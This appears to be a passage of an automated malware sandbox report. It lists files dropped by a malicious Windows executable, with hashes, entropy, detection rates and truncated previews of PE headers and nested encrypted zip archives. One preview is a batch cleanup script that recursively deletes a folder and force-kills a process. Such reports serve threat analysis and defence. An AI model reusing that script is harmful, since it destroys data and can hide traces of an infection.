                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3028480
                                                                                                                                                                                                      Entropy (8bit):6.522411107697113
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
                                                                                                                                                                                                      MD5:524AFF0AE21CF7D4731596E8F3967E32
                                                                                                                                                                                                      SHA1:27A75996DFD0AE578E28613F275B0517C0BBD975
                                                                                                                                                                                                      SHA-256:A9CE24B52ECE47DFB287B912C5223C5B659DF5C2FECE87141DFA5820ECDA23FD
                                                                                                                                                                                                      SHA-512:B65D7BB349D6FEE6714BD5B92F2CDAD7E69A6D9DDEB6F4CDDC808D18A4982A5C9E3CFDAAB842667F7FB2C94A8C809AEAB5BFE229CA696152D08F3EE453D29334
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2...../y....@.................................W...k.......D.....................1...............................1..................................................... . ............................@....rsrc...D...........................@....idata ............................@...syfpipoa. +.......+.................@...kqlprvhw......1.....................@....taggant.0....1.."..................@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:qn:qn
                                                                                                                                                                                                      MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                      SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                      SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                      SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:blat
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1679360
                                                                                                                                                                                                      Entropy (8bit):6.278252955513617
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                      MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                      SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                      SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                      SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):468992
                                                                                                                                                                                                      Entropy (8bit):6.157743912672224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                      MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                      SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                      SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                      SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):222
                                                                                                                                                                                                      Entropy (8bit):4.855194602218789
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                      MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                      SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                      SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                      SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2355713
                                                                                                                                                                                                      Entropy (8bit):5.891648193754473
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                      MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                      SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                      SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                      SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1799594
                                                                                                                                                                                                      Entropy (8bit):7.99773141173711
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                                      MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                      SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                      SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                      SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1799748
                                                                                                                                                                                                      Entropy (8bit):7.997729415613798
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                                      MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                      SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                      SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                      SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1799902
                                                                                                                                                                                                      Entropy (8bit):7.997726708945573
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                                      MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                      SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                      SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                      SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1800056
                                                                                                                                                                                                      Entropy (8bit):7.997723543142523
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                                      MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                      SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                      SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                      SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1800210
                                                                                                                                                                                                      Entropy (8bit):7.997720745184939
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                                      MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                      SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                      SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                      SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1800364
                                                                                                                                                                                                      Entropy (8bit):7.997716835838842
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                      MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                      SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                      SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                      SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3473559
                                                                                                                                                                                                      Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                      MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                      SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                      SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                      SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
